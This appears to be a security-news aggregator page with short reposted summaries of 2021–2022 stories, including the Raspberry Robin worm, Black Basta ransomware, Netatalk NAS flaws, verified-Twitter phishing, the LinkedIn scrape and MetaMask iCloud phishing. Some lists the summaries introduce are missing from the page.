The Safety Detectives cybersecurity team discovered 150 GB of exposed data in the bucket with over 50,000 user avatars. Two separate databases contained different types of information, including user avatars (profile pictures on the website) and post images.
“While this is publicly available information, user avatars could be used in conjunction with EXIF data to identify vulnerable users,” the report explains.
Post images, in turn, were uploaded by users separately to the charity’s website. The researchers detected over 300,000 such files and EXIF data attached to each post image. Such data can expose additional details about the user, including the image’s GPS location and information about the device which took the image. No contact details of website users seem to be affected.
Both private and public images were exposed in the bucket. “Private” files included sensitive user images intended for medical screening, as well as test results. At the time when the bucket was discovered, it was still constantly being updated with new data, likely affecting users globally.
While the website has 200,000 registered users, it is likely that not all of them were affected by the incident. The minimum number of exposed users, however, stands at 50,000, accounting for the avatars discovered in the bucket.
“The number of exposed people could be higher, however, considering that users could be exposed in post images even if their user avatar is not included on the bucket,” the report suggests.
The bucket was discovered on November 11th, 2021, and considering its contents, it was still in use at the time.
“It contained files dating back to April 2017, though, filenames suggest some of these images date back to 2014 and were migrated to the bucket in 2017. We saw recent files on the bucket, too, dated mid-November 2021,” the report explains.
The researchers note that while the bucket was an Amazon S3 bucket, the provider was not responsible for the misconfiguration.
Following the exposure, users could suffer from harassment, phishing campaigns, or targeted attacks. In turn, the charity might face legal charges upon the investigation by the Federal Trade Commission (FTC.)
Original Posts: A US charity leaves private images of website users exposed
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.
This malware is linked to a cluster of malicious activity dubbed Raspberry Robin and was first observed in September 2021.
Red Canary’s Detection Engineering team detected the worm in multiple customers’ networks, some in the technology and manufacturing sectors.
Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.
Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.
It uses Microsoft Standard Installer (msiexec.exe) to reach out to its command-and-control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.
“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” the researchers said.
“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
While they haven’t yet found if it establishes persistence and through which methods, they suspect that the malware installs a malicious DLL file on compromised machines to resist removal between restarts.
Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows settings) and odbcconf (a tool for configuring ODBC drivers).
The first allows it to bypass User Account Control (UAC), while the second will help execute and configure the DLL.
While the Red Canary analysts have been able to closely inspect what the newly discovered does on infected systems, there are still several questions that need to be answered.
“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said.
“One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis.”
Since there is no info on this malware’s end-stage malicious tasks, another question that needs an answer is what is the Raspberry Robin operators’ goal.
Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK of this malware, can be found in Red Canary’s report.
Microsoft says that its enterprise-grade endpoint security for small to medium-sized businesses is now generally available as a standalone solution.
Known as Microsoft Defender for Business, this product is designed for SMBs with up to 300 employees who need protection against malware, phishing, and ransomware attacks on Windows, macOS, iOS, and Android devices.
“Microsoft believes in security for all. We are proud to further deliver on that vision today,” said Vasu Jakkal, CVP, security, compliance and identity at Microsoft.
“With the GA of Defender for Business, SMBs will get greater protection with simplified security to help them better protect, detect and respond to threats.”
Microsoft Defender for Business has started rolling out to Microsoft 365 Business Premium customers worldwide beginning March 1st.
Now customers can also get Defender for Business as a standalone license straight from Microsoft and Microsoft Partner Cloud Solution Provider (CSP) channels
Defender for Business features a wizard-driven setup that makes it easier to configure clients. It will also enable all recommended security policies for organizations without a dedicated security team.
Key features bundled with this SMB-focused endpoint security suite include:
Microsoft said that it’s also planning to add support for servers later this year with the help of an add-on solution.
In November, Microsoft announced this new security solution at Microsoft Ignite 2021 after a 300% increase in ransomware attacks during 2020.
Original Posts: Microsoft Defender for Business stand-alone now generally available
Phishing emails increasingly target verified Twitter accounts with emails designed to steal their account credentials, as shown by numerous ongoing campaigns conducted by threat actors.
Verified accounts on Twitter are designated by a blue check next to their name, which indicates account holders are notable influencers, celebrities, politicians, journalists, activists, and government and private organizations.
To receive this ‘blue badge,’ Twitter users must apply for verification, which entails submitting additional information, including ID cards, website references, and other reasons that make your account ‘notable.’
These accounts typically have many followers or are considered “authorative” in some circles and thus are highly sought after by threat actors to promote scam campaigns and malicious activity.
At the same time, as it’s not easy to gain a blue badge, emails warning that Twitter will take it away tend to cause people to react quickly without analyzing the message properly for signs of suspicious behavior quickly.
Targeting verified Twitter users
These emails say that there is a problem with the recipient’s verified account and that they should click on the ‘Check notifications’ to learn more about what’s wrong.
The phishing emails warn that ignoring this message could lead to the account’s suspension.
Clicking on the ‘Check notifications’ button brings the recipient to a page prompting them to enter their login credentials. Additionally, the page will prompt users to enter their credentials twice, which the threat actors use to verify that incorrect information wasn’t entered by mistake.
After entering the credentials, the phishing kit will perform a password reset on your account using the inputted email address. The phishing page will prompt targets to enter a login verification code, which the threat actors will use to finish the password reset process.
While the phishing pages clearly do not belong to Twitter, mistakes happen in our often hectic lives, and victims commonly submit their credentials by accident.
As always, when receiving emails that lead to login forms, make sure to examine the URL of the landing page and make sure it corresponds to the company that allegedly sent you the email.
If there is any doubt, junk the email and contact the company directly to verify if the email was a scam.
Original Posts: New phishing warns: Your verified Twitter account may be at risk
Synology has warned customers that some of its network-attached storage (NAS) appliances are exposed to attacks exploiting multiple critical Netatalk vulnerabilities.
“Multiple vulnerabilities allow remote attackers to obtain sensitive information and possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM) and Synology Router Manager (SRM),” Synology said.
Netatalk is an AFP (short for Apple Filing Protocol) open-source implementation that allows systems running *NIX/*BSD to act as AppleShare file servers (AFP) for macOS clients (i.e., to access files stored on Synology NAS devices).
The Netatalk development team addressed the security bugs in version 3.1.1, released on March 22, three months after the Pwn2Own 2021 hacking competition, where they were first disclosed and exploited.
QNAP said the Netatalk vulnerabilities impact multiple QTS and QuTS hero operating system versions and QuTScloud, the company’s cloud-optimized NAS operating system.
Like Synology, QNAP has already released patches for one of the affected OS versions, with fixes already available for appliances running QTS 4.5.4.2012 build 20220419 and later.
“QNAP is thoroughly investigating the case. We will release security updates for all affected QNAP operating system versions and provide further information as soon as possible,” the NAS maker said.
“We recommend users to check back and install security updates as soon as they become available.”
Original Post: Synology warns of critical Netatalk bugs in multiple products
A new ransomware gang known as Black Basta has quickly catapulted into operation this month, breaching at least twelve companies in just a few weeks.
The first known Black Basta attacks occurred in the second week of April, as the operation quickly began attacking companies worldwide.
While ransom demands likely vary between victims, One victim who received over a $2 million demand from the Black Basta gang to decrypt files and not leak data.
Not much else is known about the new ransomware gang as they have not begun marketing their operation or recruiting affiliates on hacking forums.
However, due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.
Like other enterprise-targeting ransomware operations, Black Basta will steal corporate data and documents before encrypting a company’s devices.
This stolen data is then used in double-extortion attacks, where the threat actors demand a ransom to receive a decryptor and prevent the publishing of the victim’s stolen data.
The data extortion part of these attacks is conducted on the ‘Black Basta Blog’ or ‘Basta News’ Tor site, which contains a list of all victims who have not paid a ransom. Black Basta will slowly leak data for each victim to try and pressure them into paying a ransom.
When executed, the Black Basta encryptor needs to be run with administrative privileges, or it will not encrypt files. Once launched, the encryptor will delete Volume Shadow Copies
It will then hijack an existing Windows service and uses it to launch the ransomware encryptor executable. In our tests, the Windows Service that was hijacked was the ‘Fax’ service.
The ransomware will also change the wallpaper to display a message stating, “Your network is encrypted by the Black Basta group. Instructions in the file readme.txt.”
The ransomware will now reboot the computer into Safe Mode with Networking, where the hijacked Windows service will start and automatically begin to encrypt the files on the device.
While encrypting files, the ransomware will append the .basta extension to the encrypted file’s name. So, for example, test.jpg would be encrypted and renamed to test.jpg.basta.
The Tor negotiation site is titled ‘Chat Black Basta’ and only includes a login screen and a web chat that can be used to negotiation with the threat actors.
The threat actors use this screen to issue a welcome message that contains a ransom demand, a threat that data will be leaked if payment is not made in seven days, and the promise of a security report after a ransom is paid.
Unfortunately, Gillespie says that the encryption algorithm is secure and that there is no way to recover files for free.
Original Post: New Black Basta ransomware springs into action with a dozen breaches
Microsoft has released the optional KB5011831 Preview cumulative update for Windows 10 20H2, Windows 10 21H1, and Windows 10 21H2 that fixes 26 bugs.
This update includes many bug fixes, including those for Microsoft OneDrive, Remote Desktop, News and Interest, Azure Active Directory, and delays in booting Windows 10.
The KB5011831 cumulative update preview is part of Microsoft’s April 2022 monthly “C” update, allowing admins to test upcoming fixes to be released during the May 2022 Patch Tuesday updates.
Unlike Patch Tuesday updates, the “C” preview updates are optional and do not include any security updates. However, If you run a Windows Insider build, the preview update will be installed automatically.
Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a ‘Check for Updates.’
What’s new in Windows 10 KB5011831
The Windows 10 KB5011831 cumulative update preview includes twenty-six improvements or fixes, with the six highlighted fixes listed below:
A complete list of the twenty-six fixes found in this preview update can be found in the KB5011831 support bulletin.
Original Post: Windows 10 KB5011831 update released with 26 bug fixes, improvements
Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC).
ALAC is an audio coding format for lossless audio compression that Apple open-sourced in 2011. Since then, the company has been releasing updates to the format, including security fixes, but not every third-party vendor using the codec applies these fixes.
This vulnerability enables a remote attacker to execute code on a target device by sending a maliciously crafted audio file and tricking the user into opening it. The researchers are calling this attack “ALHACK.”
The impact of remote code execution attacks comes with severe implications, ranging from data breach, planting and executing malware, modifying device settings, accessing hardware components such as the microphone and camera, or account take over.
The case with audio codec flaws
Fixes of remote code execution flaws in closed-source audio processing units are present almost in every monthly Android security update.
However, exploiting them is rarely trivial, and the component vendors provide few technical details to reduce exploitation risk.
For example, Android patches from April included nine fixes for critical vulnerabilities in closed-source components. One of them is CVE-2021-35104 (9.8 severity score) – a buffer overflow that led to improper parsing of headers while playing FLAC audio clips.
The bug affected chipsets present in almost the entire range of products Qualcomm released over in the past several years.
How to stay safe
The standard security advice applies here, too: keep your devices up to date, in this case it means running the Android patch level “December 2021” or later.
If the device no longer receives security updates from the vendor, installing a third-party Android distribution that still provides Android patches is valid option.
Finally, when receiving audio files from unknown or suspicious sources/users, it is best not to open them since they could trigger the vulnerability.
Original Post: Critical bug in Android could allow access to users’ media files
An archive containing data purportedly scraped from 500 million LinkedIn profiles has been put for sale on a popular hacker forum, with another 2 million records leaked as a proof-of-concept sample by the post author.
The four leaked files contain information about the LinkedIn users whose data has been allegedly scraped by the threat actor, including their full names, email addresses, phone numbers, workplace information, and more.
While users on the hacker forum can view the leaked samples for about $2 worth of forum credits, the threat actor appears to be auctioning the much-larger 500 million user database for at least a 4-digit sum, presumably in bitcoin.
A statement from LinkedIn appears to confirm the latter: the company states that the data for sale was not acquired as a result of a data breach, and “is actually an aggregation of data from a number of websites and companies.”
LinkedIn facing a probe from Italy’s privacy watchdog
Following “the dissemination of user data, including IDs, full names, email addresses, telephone numbers” by the threat actor, Italy’s privacy watchdog began an investigation into the incident on Thursday.
The Italian authority said that the country has one of the highest LinkedIn subscriber counts among European states and called on affected users to “pay particular attention to any anomalies” related to their phone number and their account.
A new collection with 327M more LinkedIn profiles appears on hacker forum
It seems that other threat actors are looking to piggyback on the leak. On Friday, a new collection of LinkedIn databases has been put for sale on the same hacker forum by another user – for $7,000 worth of bitcoin.
The new author claims to be in possession of both the original 500-million database, as well as six additional archives that allegedly include 327 million scraped LinkedIn profiles:
If true, this would put the overall number of scraped profiles at 827 million, exceeding LinkedIn’s actual user base of 740+ million by more than 10%. This means that some, if not most, of the new data sold by the threat actor might be either duplicate or outdated.
What was leaked?
Based on the samples we saw from the leaked files, they appear to contain a variety of mostly professional information from LinkedIn profiles, including:
The data from the leaked files can be used by threat actors against LinkedIn users in multiple ways by:
If you suspect that your LinkedIn profile data might have been scraped by threat actors, we recommend you:
Also, watch out for potential phishing emails and text messages. Again, don’t click on anything suspicious or respond to anyone you don’t know.
Original Post: LinkedIn Data Breach – 500M Records Leaked and Being Sold
Apple users are being warned by cryptocurrency wallet MetaMask over some security vulnerabilities involving iCloud backups.
The warning is said to be against potential phishing attacks for all iPhone, iPad, and Mac users. It involves certain default device settings which store MetaMask users’ seed phrase onto iCloud, whenever anyone enables automatic backups for app data. The seed phrase is also called a “password-encrypted MetaMask vault.”
The warning is said to be against potential phishing attacks for all iPhone, iPad, and Mac users. It involves certain default device settings which store MetaMask users’ seed phrase onto iCloud, whenever anyone enables automatic backups for app data. The seed phrase is also called a “password-encrypted MetaMask vault.”
The MetaMask vault being stored in Apple users’ iCloud credentials can lead to “stolen funds,” which is why they taught people how to disable their iCloud backups to avoid phishing attacks. If you’re a MetaMask user, here’s what you need to do:
How Did The Phishing Attack Go?
The MetaMask user, who posted that he’s giving a 100k reward to anyone who gets (or helps get) his digital assets back, also tweeted how everything went down.
According to him, he got a phone call from Apple on his caller ID which looked quite legitimate. Suspecting a scam, he called the aforementioned Apple number back and somebody answered, asking for a code that was sent to his phone. It is assumed that he told them the code, and his entire MetaMask was wiped “2 seconds later.” It is safe to assume that the caller who answered sounded real enough, which fooled the user in spades.
It is very likely that the malicious code sent to his phone in the guise of something like an OTP (one-time password) was the one that led to his assets being stolen. That is one of the hallmarks of phishing-tricking you into doing something you never intended.
In total, the user lost 132.86 ETH from his wallet (over $400k at the time of the theft) and 252,400 USDT for a total loss of $655,388.
In the aftermath of the theft and the discovery of the security flaw, many MetaMask users have emphasized the importance of using cold storage for all your digital assets. Aside from that, they also preached that people be extra careful when storing what they own inside a hot wallet.
Original Post: Apple Users Warned By MetaMask Over Potential Phishing Attacks Via iCloud
« Previous 1 … 16 17 18 19 20 21 Next »